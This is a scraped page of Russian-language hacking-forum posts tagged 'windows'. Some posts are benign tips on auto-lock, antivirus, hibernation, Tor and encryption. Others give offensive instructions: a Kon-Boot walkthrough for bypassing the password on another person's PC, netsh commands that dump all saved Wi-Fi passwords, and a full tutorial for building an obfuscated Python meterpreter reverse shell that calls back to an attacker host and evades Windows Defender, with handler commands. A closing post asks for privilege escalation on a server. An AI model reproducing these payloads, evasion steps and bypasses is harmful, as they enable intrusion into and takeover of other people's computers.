Новости и объявления.
- Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
Search the Community
Showing results for tags 'windows'.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете настроить автоматическую блокировку Windows при вашем отсутствии. Если вы часто отходите от компьютера, забывая заблокировать его вручную комбинацией клавиш «Win + L», то вам поможет функция динамической блокировки, которая позволяет блокировать учетную запись при отдалении связанного по Bluetooth устройства от компьютера. Чтобы использовать данную возможность, сперва необходимо выполнить сопряжение с носимым устройством. Для этого перейдите в «Параметры», затем раздел «Устройства» и в пункте «Bluetooth и другие устройства» подключите нужный гаджет. После чего, вернитесь в «Параметры» и перейдите в «Учётные записи», а после в раздел «Варианты входа». Пролистайте до пункта «Динамическая блокировка» и поставьте галочку напротив «Разрешить Windows автоматически блокировать устройство в ваше отсутствие». Теперь вы можете проверить, работает ли функция, убрав смартфон за пределы допустимого Bluetooth-диапазона вашего компьютера. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье, я хочу рассказать вам о том, как удалить практически все вирусы с Windows. Данные способы, программы и утилиты помогут вам удалить вирусы с компьютера. Качайте из надежных и официальных источников. 1. Dr.Web CureIt Незаменимое средство для лечения Вашего компьютера от вирусов и нежелательных программ при помощи антивируса Dr.Web. Скачать – https://free.drweb.ru/cureit/ 2. Malwarebytes Антивирусная программа, которая находит и удаляет вредоносные программы. Скачать – https://ru.malwarebytes.com/ 3. ESET Советуем использовать как основной антивирус. Он платный. Скачать – http://www.esetnod32.ru/ Для улучшения эффекта проверки сканируйте систему в безопасном режиме. И чтобы избежать в будущем захвата вашего компьютера вирусами, перед установкой любой программы, сканируйте её на Virustotal. В целом, используя данные программы и придерживаясь этим советам, вы сможете очень сильно обезопасить свое пребывание за компьютером. Большинство вирусов не способны противостоять подобным мерам защиты. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете отключить гибернацию в Windows. Гибернация - энергосберегающее состояние компьютера, предназначенное в первую очередь для ноутбуков. В режиме гибернации данные о состоянии системы и программ сохраняются на системном жестком диске в скрытом файле «hiberfil.sys», после чего ноутбук выключается. Самый простой способ включения или отключения режима гибернации - использовать командную строку. Потребуется запустить ее от имени администратора: для этого кликните правой кнопкой мыши по кнопке «Пуск» и выберите соответствующий пункт. Чтобы отключить гибернацию, в командной строке выполните команду «powercfg -h off» и нажмите Enter. Это отключит данный режим, удалит файл «hiberfil.sys» с жесткого диска и отключит опцию быстрого запуска Windows 10, которая также задействует данную технологию и без гибернации не работает. Это самый быстрый и простой способ отключения гибернации, поэтому если вам это необходимо, то отключайте. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной статье хочу поговорить о том, как можно пропускать всех трафик через Tor прям в Windows. Пропуск трафика через TOR увеличивает безопасность и анонимность в 2 раза, а также шанс того, что вас накроют федералы уменьшается в разы. Один из минусов туннелирования трафика является двукратное уменьшение скорости интернет-соединения. Установка: Для начала нужно скачать сам клиент TOR Browser. Далее скачиваем Proxifiler, безопасно скачать данный инструмент сложновато, поэтому обязательно используйте антивирус. Настройка: Запустите TOR, а затем Proxifiler. Откройте вкладку "Profile" и выберите "Proxy servers". Будет открыто окно, в котором нужно кликнуть на "Add" и ввести "127.0.0.1", порт обязательно "9050" с типом Socks 5. Всё готово, после этих действий, весь трафик будет проходить через TOR. Это очень полезная функция, так как сильно увеличивает безопасность вашего подключения. Поэтому рекомендую использовать этот метод, чтобы добить максимальной анонимности в вашем Tor браузере. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Всем привет, иногда бывает ситуация, что вы забыли пароль от своей ОС. И вы в недоумении будете думать, а что же делать? Как раз-таки это мы сейчас обсудим, я вам расскажу, как вы можете взломать свой собственный пароль на Windows. Ну вы конечно же понимаете, что можете не только и свой. Первым делом нам нужно скачать Kon-Boot, именно с ним мы и будем работать. После чего мы подключаем флешки и форматируем его в системе FAT32, как вы понимаете, вся информация с накопителя будет уничтожена. Далее мы разархивируем файл, в котором находится необходимая нам программа. Дальше мы открываем папку kon-bootUSB и открываем usbinstall2NEEDADMIN.летучая мышь выдав ей права администратора. Теперь, если к вашему компьютеру подключен один накопитель, то в программе нажимаем все галочки, до тех пор, пока не появится строчка USB kon-boot is Ready. Отлично, флешка подготовлена к эксплуатации. Вытаскиваем ее из нашего компьютера. Теперь мы устанавливаем наш накопитель в компьютер, который нам необходимо взломать. После этого мы запускаем БИОС и там выбираем способ загрузки с USB. Стартуем Windows. Сразу предупреждаю, если взламываемая система с Windows 8 или 8.1, то она будет загружена в режиме UEFI, поэтому чтобы наша программа заработала, нам нужно в БИОСе выключить Secure Boot. После того как вы избавились этой проблемы, можете вставить накопитель в компьютер и опять стартуем винду. С помощью данной программы вы сможете зайти в операционную систему не вводя ничего, это достигается путем изменения ядра Windows, при этом пароль никуда не пропадает, при обычном запуске он все также будет требоваться и будет абсолютно таким же как и прежде. Некоторые особенности работы: Вы не сможете воспользоваться данным методом, если для входа в Windows 10 используется учетная запись Майкрософт. Данная программа способно обойти только компьютерную учетную запись.Вы не сможете произвести взлом если в БИОСе включен тот самый Security Boot.Может случиться, что в некоторых портах USB данный метод работать не будет.Так же как я уже говорил, пароль с компьютера не удаляется, он всего лишь обходится.Не всегда срабатывает с первого раза.
-
Привет, хакеры, может произойти такая ситуация, что будет утерян пароль от беспроводной сети, к которой подключен пользователь, возможно просто хотите узнать к каким сетям компьютер был подключен раньше. В данной и следующей статье я расскажу, как проверить эти данные для Windows и Linux соответственно. Данная инструкция предназначена для Windows. Как узнать пароли WiFi Узнать пароль от сети, к которой подключен компьютер пользователя в момент проверки, можно при помощи графического интерфейса. Для этого переходим в “Центр управления сетями и общим доступом”. Далее кликаем на название сети, скриншот: Появляется новое окошко, тыкаем “Свойства беспроводной сети”, после чего нажимаем на вкладку “Безопасность” и отмечаем пункт “Отображать вводимые знаки” Теперь о том, как проверить к каким сетям компьютер был подключен ранее и какие использовал при этом пароли. Рассмотри несколько способов. Первый заключается в использовании консоли Windows, а второй в использовании специального ПО. Начнем с первого варианта и откроем консоль при помощи сочетании клавиш “Win + R” и напишем команду “cmd”, теперь можно пользоваться командной строкой. Чтобы просмотреть возможные профили, необходимо прописать: netsh wlan show profile Идем дальше, для просмотра паролей всех сетей: netsh wlan show profile name=* key=clear Для просмотра пароля определенной сети: netsh wlan show profile name="имя_сети" key=clear Заменяем настоящее имя сети на необходимое, к примеру: netsh wlan show profile name="dlink" key=clear В данном примере просматривается 4 профиля и их пароли. Но данный компьютер подключался к большему количеству беспроводных сетей. Для этого используется второй способ со специальным программным обеспечением, а именно программа – WirelessKeyView. Программа с закрытым исходным ходом, однако все равно является абсолютно бесплатной. Никаких особых вещей рассказывать про инструмент не нужно, здесь все интуитивно понятно. Здесь видим все сети и пароли, к которым был подключен компьютер. В следующей статье ждите информацию по Linux.
-
Всем привет. Сегодня рассмотрим вариант запуска meterpreter сессии на машине Windows 10 с самыми свежими патчами (включая Windows Defender). И все также будем обходить антивирусы. Meterpreter — расширенная многофункциональная начинка (payload, нагрузка), которая может быть динамически расширена во время выполнения. В нормальных условиях это обеспечивает вас основной оболочкой и позволяет вам добавлять новые особенности к ней по мере необходимости. Будем мы это делать с помощью Python, и посмотрим, как поведут себя антивирусные средства. Предугадывая вопрос «А нужен ли нам Python на машине жертвы для запуска ехе?», отвечу сразу – нет, не нужен, все уже внутри. В данной статье мы будем использовать: Windows 10 с включенным Windows Defender с обновленными базами (компьютер жертвы 192.168.1.113);Kali linux для использования metasploit и msfvenom (192.168.1.126); Windows 10 для сборки бинарника (в нашей лаборатории совпадает с компьютером жертвы) с установленными; Python (3, но и для 2 тоже посмотрим);py2exe.Для начала обозначим проблему: создадим exe файл со стандартной нагрузкой, скопируем на машину жертвы и посмотрим к чему это приведёт. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.126 LPORT=9001 -f exe > hunt.exe Мы получаем предупреждение от нашего старого друга Windows Defender, которого мы так все любим. Давайте запустим Python и сделаем то, ради чего мы все тут собрались. Python/meterpreter/reverse_tcp – это уникальный кроссплатформенный payload Metasploit Framework, который позволяет удаленно управлять скомпрометированным компьютером. Не нужно думать о том, какую платформу выбрать, он сработает на любой, но в данном случае сделаем из него исполняемый файл под Windows. Для начала установим пакет py2exe, который позволяет сделать исполняемый файл Windows из Python скрипта. У нас это будет Python 3.4 (все что выше – не поддерживает py2exe). py -3.4 –m pip install py2exe или pip install py2exe Далее создадим «сырой» питоновский код с расширением .py msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.126 LPORT=9001 -f raw > hunt.py Так же в вывод msfvenom нам необходимо добавить импорт getpass, который он забывает сделать сам. В итоге получиться должно так: import getpass,base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMS4xMjYnLDkwMDEpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK'))) Теперь у нас все готово для создания бинарника. python34 -m py2exe.build_exe hunt.py --bundle-files 0 Уже лучше, теперь проверим это в действии – после копирования на машину жертвы обходимся без алертов. Параллельно запустим наш msf и handler для питона, запустив последовательно команды: msfconsole use exploit/multi/handler set PAYLOAD python/meterpreter/reverse_tcp set lhost 192.168.1.126 set lport 9001 run Пойдем дальше и убедимся, что сессия работает корректно. Таким образом сессия запущена и Windows Defender не сработал, чего мы и добивались. Заодно давайте рассмотрим, что делать, если у вас Python 2ой версии. Качаем py2exe для python 2 Генерируем payload с расширением .py Создаем файл setup.py и пишем туда следующее: from distutils.core import setup import py2exe setup( name = ‘Meter’, description = ‘Python-based App’, version = ‘1.0’, console=[‘hunt.py’], options = {‘py2exe’: {‘bundle_files’: 1,’packages’:’ctypes’,’includes’: ‘base64,sys,socket,struct,time,code,platform,getpass,shutil’,}}, zipfile = None, ) python.exe .\setup.py py2exeДолжно получиться все то же самое. В качестве итога замечу, что оболочка python meterpreter уступает по функционалу более привычному windows meterpreter. Например, не получится мигрировать в процесс или использовать команды типа getsystem, но все же это реальная альтернатива: получить сессию для работы с msf (routing и portfwd как минимум) и далее работать внутри сети.
-
- windows
- windows defender
- (and 12 more)
-
Всем привет, сегодня мы опять немного поговорим об анонимности и конфиденциальности ваших данных. По этому поводу было уже написано немало статей, однако ситуация от этого не становится менее актуальной. Поэтому прямо сейчас я кратко расскажу вам про несколько программ, которые позволят вам зашифровать ваши данные. Ведь шифрование данных является отличным инструментом, который позволяет защитить вашу личную информацию от третьих лиц. Не будем медлить, начнем! 1.AxCrypt Это утилита, впрочем, как и многие другие, имеет открытый код, а значит это позволяет быстро развиваться данной программе. Однако, данная программа шифрует данные только по 128-битному методу AES. Этот алгоритм является весьма надежным, но здесь он единственный, что можно записать как недостаток. 2.VeraCrypt Данная программа уже не первый раз упоминается в статьях, на это есть причины. Эта утилита имеет в своем арсенале несколько методов шифрования, а именно 256-битный AES, шифрование с помощью Serpent, а также Two Fish. 3.DiskCryptor В очередной раз, что можно отметить в данной программе, это то, что она имеет открытый исходный. Для шифрования использует шифр, который нужен для того, чтобы иметь возможность заблокировать определенный раздел на вашем диске, а также и системные разделы. Пользуется теми же алгоритмами шифрования, что и вышеуказанная программа. 4. LaCie Private-Public Не особо отличающаяся программа от своих братьев. Однако она имеет место быть в этом списке, так как является довольной популярной и удобной. Как и многие имеет открытый исходный код, а также для шифрования использует уже давно нами знакомый 256-битный алгоритм AES. 5. Gpg4win Эта утилита является не только хорошим способом шифрования данных, но и конфиденциальной передачи ваших сообщений. Для этого можно воспользоваться всеми возможными способа криптографии. Также данная программа включает в себя некоторые модули, о который мы поговорим ниже: GnuPg – именно этот модуль отвечает за шифрование данныхKleopatra – является диспетчером сертификатов, а также для диалогов проводимых с помощью криптографииGpgOL – является плагином для Microsoft OutlookGpgEX – является плагином для Microsoft Explorer и служил для шифрования файловGPA – используется как альтернатива Kleopatra, а значит является еще одним диспетчером сертификатов, а также поддерживает все методы криптографического шифрования.
-
- программа
- приложение
-
(and 11 more)
Tagged with:
-
Приветствую всех, есть сервер с ОС windows server 2003 r2 sp2. Есть доступ по локальной сети к разным пользователям, но все лишь обычные юзвери, т.е. доступа администраторского нет! хотелось бы узнать, как можно обойти права, или дать себе доступ. Сервер перезагружать нельзя, работает 24/7. Много чего нашел, но почти все способы, это сброс пароля с помощью загрузочных образов. Есть какие то решения?